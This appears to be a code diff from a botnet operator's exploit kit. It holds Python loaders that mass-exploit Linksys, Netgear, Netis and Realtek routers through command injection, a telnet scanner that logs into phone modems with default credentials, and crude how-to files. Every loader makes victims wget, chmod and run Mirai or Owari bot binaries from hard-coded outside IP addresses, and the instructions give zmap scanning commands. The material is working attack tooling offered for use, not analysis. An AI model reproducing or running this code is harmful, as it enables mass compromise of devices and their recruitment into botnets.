+		if thread.isAlive() == True:
+			done = False
+			break
+		else:
+			done = True
+	if done == True:
+		writingit = open("vuln.txt", "w")
+		writingit.write(finalprintout)
+		writingit.close()
+		print(str(total) + " of out " + str(pretotal) + " credentials dumped, " + str(int(100 / pretotal * total)) + "% success rate. ")
+		break

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Linksys/linksys.py

@@ -0,0 +1,39 @@
+#! python !#
+import threading, sys, time, random, socket, subprocess, re, os, base64, struct, array, requests
+from threading import Thread
+from time import sleep
+import requests
+from requests.auth import HTTPDigestAuth
+from decimal import *	
+ips = open(sys.argv[1], "r").readlines()
+
+url_data = {
+    "submit_button": "",
+    "change_action": "",
+    "action": "",
+    "commit": "0",
+    "ttcp_num": "2",
+    "ttcp_size": "2",
+    "ttcp_ip": "-h `cd /tmp; rm -rf kowai.mpsl; wget http://176.32.33.247/bins/kowai.mpsl; chmod 777 kowai.mpsl; ./kowai.mpsl linksys`",
+    "StartEPI": "1",
+}
+
+class rtek(threading.Thread):
+		def __init__ (self, ip):
+			threading.Thread.__init__(self)
+			self.ip = str(ip).rstrip('\n')
+		def run(self):
+			try:
+				print "[LINKSYS] Loading - " + self.ip
+				url = "http://"+self.ip+":8080/tmUnblock.cgi"
+				requests.post(url, data=url_data, timeout=3)
+				requests.get(url, timeout=3)
+			except Exception as e:
+				pass
+for ip in ips:
+	try:
+		n = rtek(ip)
+		n.start()
+		time.sleep(0.03)
+	except:
+		pass

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Netgear-dead or broke/infos.txt

@@ -0,0 +1,12 @@
+Port scanning for this exploit: 8443
+
+# First of all edit the LINE AROUND 33/34 with your Mirai BINS.
+---------------------------------------
+Then run simply a scan with zmap
+
+# zmap -p8443 -omfu.txt -N 450000
+or using the .lst 
+# zmap -p8443 -omfu.txt -w listname.lst
+
+
+zmap -p8443 -N 250000 -omfu.txt

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Netgear-dead or broke/netgear.py

@@ -0,0 +1,47 @@
+import threading, random, socket, time, sys, requests, re
+
+
+if len(sys.argv) < 2:
+	print "\033[37mHow to use: python "+sys.argv[0]+" <list>\033[37m"
+	sys.exit()
+
+server_ip = "159.89.33.167"
+port = 8443
+# CONFIGURE URL LINE 33 MIPS BINARY DEFAULT: "ntpd"
+class r7000(threading.Thread):
+	def __init__ (self, ip):
+		threading.Thread.__init__(self)
+		self.ip = str(ip).rstrip('\n')
+	def run(self):
+		try:
+			try:
+				s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+				s.settimeout(4)
+				s.connect((self.ip, port))
+				s.close()
+				fail = 0
+			except:
+				fail = 1
+				pass
+			try:
+				if fail:
+					pass
+				else:
+					r = requests.get("http://"+self.ip+":8443/cgi-bin/;cd${IFS}/var/tmp;${IFS}wget${IFS}http://"+server_ip+"/bins/Owari.x86;${IFS}chmod${IFS}777${IFS}Owari.x86;${IFS}./Owari.x86;${IFS}rm${IFS}-rf${IFS}Owari.x86;", timeout=12)
+					if r.status_code == 200 and "Not Found" not in r.text:
+						print "INFECTED "+self.ip
+					elif r.status_code == 404:
+						sys.exit()
+			except:
+				pass
+		except Exception as e:
+			pass
+
+ips = open(sys.argv[1], "r").readlines()
+for ip in ips:
+	try:
+		t = r7000(ip)
+		t.start()
+		time.sleep(0.01)
+	except Exception as e:
+		pass

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Netis-dead/HOW TO.txt

@@ -0,0 +1,47 @@
+There are multiple ways to scan netis so we are going to go over
+all of them here. They are all very simple just pay attention.
+ 
+...........................................................................................................
+Lets start with installing what you will need to scan it.
+ 
+For Centos:
+yum update -y; yum install python python-requests python-paramiko -y
+(Download the file named zmap.sh from my pastebin and upload it)
+sh zmap.sh
+ 
+For any other os:
+apt-get update -y; apt-get install zmap python python-requests python-paramiko -y
+...........................................................................................................
+-----------------------------------------------------------------------------------------------------------
+...........................................................................................................
+Now, for the first method of scanning netis you need to run these commands on your server:
+python -c "pring 'A'*8 + 'netcore \x00'" > login
+ 
+Then:
+ 
+python -c "print 'AA\x00\x00AAAA (YOUR PAYLOAD HERE)*\x00'" > payload
+...........................................................................................................
+-----------------------------------------------------------------------------------------------------------
+...........................................................................................................
+One way to scan netis is with a sh file.
+ 
+1: nano anything.sh
+2: paste the ranges found on my pastebin or add your own
+3: sh anything.sh
+An example of the ranges would be
+(zmap -M udp -p53413 --probe-args=file:login -i eth0 1.0.0.0/8)
+Doing this will run the zmap command scanning all the ranges in the sh file.
+...........................................................................................................
+-----------------------------------------------------------------------------------------------------------
+...........................................................................................................
+Another way to scan zmap is with a .lst file.
+Download the .lst files as well as a loader and a sh file
+that will run the commands to scan for you from the zip file
+using the link at the bottom of the paste.
+ 
+1: download the files
+2: upload the files
+3: sh netis.sh
+...........................................................................................................
+-----------------------------------------------------------------------------------------------------------
+...........................................................................................................

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Netis-dead/Netis Files/netis.py

@@ -0,0 +1,35 @@
+#!/usr/bin/python
+# netis loader
+# by light
+
+import threading, sys, time, random, socket, re, os
+
+if len(sys.argv) < 2:
+        print "Usage: python "+sys.argv[0]+" <list>"
+        sys.exit()
+
+loginpayload = "AAAAAAAAnetcore\x00"
+commandpayload = "AA\x00\x00AAAA (PAYLOAD HERE)"
+list = open(sys.argv[1], "r").readlines()
+offline = 0
+class netis(threading.Thread):
+        def __init__ (self, ip):
+			threading.Thread.__init__(self)
+			self.ip = str(ip).rstrip('\n')
+        def run(self):
+			s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+			try:
+				print "\033[31m[\033[32m+\033[31m] \033[32mAttempting:\033[32m %s"%(self.ip)
+				s.sendto(loginpayload, (self.ip, 53413))
+				time.sleep(1.5)
+				s.sendto(commandpayload, (self.ip, 53413))
+				time.sleep(30)
+			except Exception:
+				pass
+for ip in list:
+	try:
+		t = netis(ip)
+		t.start()
+		time.sleep(0.01)
+	except:
+		pass

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Netis-dead/Netis Files/netis.sh

@@ -0,0 +1 @@
+ulimit -n 999999; zmap -M udp -p53413 -i eth0 -wyay.lst -oyay.txt; python netis.py yay.txt; zmap -M udp -p53413 -i eth0 -wgodly.lst -ogodly.txt; python netis.py godly.txt; zmap -M udp -p53413 -i eth0 -wbanana.lst -obanana.txt; python netis.py banana.txt;

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Netis-dead/netis.py

@@ -0,0 +1,35 @@
+#!/usr/bin/python
+# netis loader
+# by light
+
+import threading, sys, time, random, socket, re, os
+
+if len(sys.argv) < 2:
+        print "Usage: python "+sys.argv[0]+" <list>"
+        sys.exit()
+
+loginpayload = "AAAAAAAAnetcore\x00"
+commandpayload = "AA\x00\x00AAAA (PAYLOAD)"
+list = open(sys.argv[1], "r").readlines()
+offline = 0
+class netis(threading.Thread):
+        def __init__ (self, ip):
+			threading.Thread.__init__(self)
+			self.ip = str(ip).rstrip('\n')
+        def run(self):
+			s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+			try:
+				print "\033[31m[\033[32m+\033[31m] \033[32mAttempting:\033[32m %s"%(self.ip)
+				s.sendto(loginpayload, (self.ip, 53413))
+				time.sleep(1.5)
+				s.sendto(commandpayload, (self.ip, 53413))
+				time.sleep(30)
+			except Exception:
+				pass
+for ip in list:
+	try:
+		t = netis(ip)
+		t.start()
+		time.sleep(0.01)
+	except:
+		pass

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Phone/phone.py.py

@@ -0,0 +1,98 @@
+#!/usr/bin/python
+# Phone Swiper Scanner 
+ 
+import threading, sys, time, random, socket, re, os
+ 
+if len(sys.argv) < 3:
+    print "Phone Swiper Scanner\n"
+    print "Usage: python "+sys.argv[0]+" <threads(1-100+)> <ips(1-1000+)>"
+    sys.exit()
+ 
+usernames = ["root", "admin"]
+passwords = ["oelinux123", "admin"]
+url = "http://103.194.169.245/tftp" # ARM4 Bin
+threads = int(sys.argv[1])
+ipz = int(sys.argv[2])
+Tranges = ["119.150","119.151","119.152","119.153","119.154","119.155","119.156","119.157","119.158","119.159","182.184","182.185","182.186","182.187","182.188","182.189","182.190","182.191"]
+ 
+def readUntil(tn, string, timeout=8):
+    buf = ''
+    start_time = time.time()
+    while time.time() - start_time < timeout:
+        buf += tn.recv(1024)
+        time.sleep(0.01)
+        if string in buf: return buf
+    raise Exception('TIMEOUT!')
+ 
+def worker():
+    try:
+        print "\033[33mStarting Telnet Thread\033[37m"
+        while True:
+            try:
+                h0h0h0 = h0h0 + 1
+                br2 = random.choice(Tranges)
+                for x in xrange(h0h0h0):
+                    try:
+                        ip = ''+br2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
+                        t = telnet(ip)
+                        t.start()
+                        time.sleep(0.009)
+                    except:
+                        pass
+                time.sleep(2)
+            except:
+                print "\033[31mWORKER ERROR\033[37m"
+                pass
+    except:
+        pass
+ 
+class telnet(threading.Thread):
+        def __init__ (self, ip):
+            threading.Thread.__init__(self)
+            self.ip = str(ip).rstrip('\n')
+        def run(self):
+            try:
+                tn = socket.socket()
+                tn.settimeout(8)
+                tn.connect((self.ip,23))
+            except Exception:
+                pass
+            try:
+                hoho = ''
+                hoho += readUntil(tn, ":")
+                if "mdm9625" in hoho:
+                    r00t = 0
+                    username = usernames[1]
+                    password = passwords[1]
+                    tn.send(username + "\n")
+                if "9615-cdp" in hoho:
+                    r00t = 1
+                    username = usernames[0]
+                    password = passwords[0]
+                    tn.send(username + "\n")
+            except Exception:
+                pass
+            try:
+                hoho = ''
+                hoho += readUntil(tn, ":")
+                if "assword" in hoho:
+                    tn.send(password + "\n")
+                    time.sleep(3.5)
+            except Exception:
+                pass
+            try:
+                mp = ''
+                mp += tn.recv(1024)
+                if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
+                    if r00t: tn.send("cd /tmp; rm -rf phone; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
+                    if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
+            except Exception:
+                pass
+ 
+for g in xrange(threads):
+    try:
+        t = threading.Thread(target=worker)
+        t.start()
+        time.sleep(0.002)
+    except:
+        pass

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Realtek-lowbots/How to Scan Realtek.txt

@@ -0,0 +1,13 @@
+Step 1: Installing the Dependancies
+sudo yum install -y https://centos7.iuscommunity.org/ius-release.rpm
+sudo yum update -y
+sudo yum install -y python36u python36u-libs python36u-devel python36u-pip
+pip3.6 install requests
+
+Step 2: Edit Realtek.py with the Mips of the mirai source and with the mirai ip
+*Use Mips Payload
+
+Step 3: Scanning
+sh j.sh
+
+Step 4: BIG MOTHERFUCKING BOATS

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Realtek-lowbots/Realtek.py

@@ -0,0 +1,29 @@
+#! python !#
+import threading, sys, time, random, socket, re, os, struct, array, requests
+ips = open(sys.argv[1], "r").readlines()
+binloc = "http://104.248.137.98/Binarys/Owari.mips"
+rm = "<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; rm -rf t`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>"
+wget = "<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; wget "+binloc+" -O t`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>"
+execute = "<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; chmod 777 t; ./t realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>"
+headerlist = {'SOAPAction': 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'}
+
+class rtek(threading.Thread):
+		def __init__ (self, ip):
+			threading.Thread.__init__(self)
+			self.ip = str(ip).rstrip('\n')
+		def run(self):
+			try:
+				url = "http://" + self.ip + ":52869/picsdesc.xml"
+				requests.post(url, timeout=10, headers=headerlist, data=rm)
+				requests.post(url, timeout=10, headers=headerlist, data=wget)
+				requests.post(url, timeout=10, headers=headerlist, data=execute)
+				print ("[REALTEK] Loading " + self.ip)
+			except Exception as e:
+				pass
+
+for ip in ips:
+	try:
+		n = rtek(ip)
+		n.start()
+	except:
+		pass

TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Yarn-bigboats/READ ME.txt

@@ -0,0 +1,15 @@
+Hello world, fuck my life
+
+1) edit ur fucking yarn.py with your mirai server and your mirai bins
+2) start the yarn exploit trought: python yarn.py mfu.txt
+3) fuck your life
+
+enjoy
+
+
+NOTE: If you want to scan your self mfu.tx
+run trought "zmap"
+
+# zmap -p8088 -omfu.txt -N 450000
+or using the .lst 
+# zmap -p8088 -omfu.txt -w listname.lst